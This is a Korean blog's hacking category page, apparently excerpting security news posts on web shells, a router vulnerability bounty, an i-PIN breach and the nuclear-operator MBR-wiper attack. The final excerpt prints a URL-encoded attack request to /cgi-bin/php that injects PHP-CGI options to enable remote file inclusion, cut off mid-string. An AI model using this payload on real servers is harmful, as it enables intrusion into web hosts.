본문 바로가기

해킹189

웹셸 탐지 및 방어 솔루션 해킹당한 웹서버 중 90% 이상 웹서버에서 웹셸 발견 웹 보안의 기본은 웹셸 탐지 및 방어...웹셸 방어 솔루션 살펴보니http://www.boannews.com/media/view.asp?idx=46468&kind=0 KISA 인터넷침해대응센터에 따르면, 해킹당한 웹서버 중 웹셸이 발견된 웹서버는 90% 이상이다. 지난해 2월 26일 의사협회 8만명, 치과의사협회 5만 6천명, 한의사협회 2만명 등 총 15만 6천명의 개인정보가 유출됐다. 이 3개 협회 홈페이지는 공격자가 악성코드를 웹사이트에 심어서 관리자 권한을 획득한 후, 웹셸을 이용해 개인정보를 탈취한 것으로 조사됐다. 지난해 3월 7일 113만명의 개인정보가 유출된 티켓몬스터의 경우에도 공격자가 홈페이지 게시판 등에 웹셸을 심어 해킹했다. 이와.. 2015. 6. 9.
공유기 해킹 꼼짝마! 취약점 집중 신고 기간 운영 한국인터넷진흥원(KISA, 원장 백기승)은 공유기 취약점을 악용한 디도스(DDoS) 공격, 개인정보 유출 등 침해사고를 예방하기 위해 ‘공유기 취약점 신고 포상제’를 오는 16일(수)부터 1개월간(4.16~5.15) 실시하는 등 집중 점검에 나선다고 밝혔다. 최근 사물인터넷(IoT) 시대로 들어서면서 기기들이 공유기와 같은 게이트웨이(Gate Way)로 데이터를 주고받으며 공유기 보안의 중요성이 대두되고 있다. 최근 미래부는 공유기 취약점 문제를 해결하기 위해 「공유기 보안 강화대책」을 발표하였으며, 후속 대책으로 공유기 취약점 신고 포상제를 추진하게 되었다. 한국인터넷진흥원은 신고 접수된 공유기 취약점을 확인하여 해당 공유기제조사에 보완 조치를 요청하고, 이행 여부를 지속적으로 점검 할 계획이다. 또한.. 2015. 4. 17.
'주민번호 대체' 아이핀 해킹당해…75만건 부정발급 행자부 "17만건 게임사이트에서 사용…피해 파악 중" "공공아이핀 시스템 전면 재구축 검토" http://www.yonhapnews.co.kr/bulletin/2015/03/05/0200000000AKR20150305081700004.HTML 행정자치부는 지난달 28일부터 2일 오전까지 공공아이핀 시스템이 해킹 공격을 받아 75만 건이 부정 발급된 것으로 파악됐다고 5일 밝혔다. 행자부는 단기간에 급격히 아이핀 발급량이 증가하자 경위를 조사한 결과 해킹 및 부정발급 사실을 확인했다. 현재까지 부정 발급된 공공아이핀 75만 건 중 17만 건이 3개 게임사이트에서 신규회원가입이나 이용자 계정 수정·변경에 사용된 것으로 파악됐다. 이번 공격은 주민번호를 도용해 정식으로 발급받은 아이핀을 거래한 것이 아니라 아.. 2015. 3. 5.
한국수력원자력 MBR 파괴 악성코드 공격받아 최근 국내 주요 원전시설을 운영하는 한국수력원자력(이하 한수원)이 마스터 부트 레코드(이하 MBR)를 삭제하도록 설계된 악성코드에 감염되어 사회적 이슈가 되고 있습니다. 악성코드는 한글 워드 프로세서(HWP) 취약점을 통해 감염되었으며, 한수원 임직원들이 악성 첨부파일을 실행하도록 하기 위한 다양한 사회공학적 공격 기법이 사용되었습니다. 아래 그림과 같이 공격은 임직원들에게 전송된 스피어피싱 이메일에서부터 시작되었으며 첨부파일 실행시 2가지 악성코드를 설치하는 방식으로 진행되었습니다.MBR 파괴 공격의 감염 경로 악성코드에 대한 설명이 악성코드의 진단명은 TROJ_WHAIM.A이며, 감염된 시스템의 MBR을 파괴합니다. MBR 파괴 이외에도 감염된 시스템에서 특정 파일을 덮어쓰기 하는 기능과 감염된 시스.. 2014. 12. 27.
쉘코드 웹공격 사례 샘플 POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68.. 2014. 9. 4.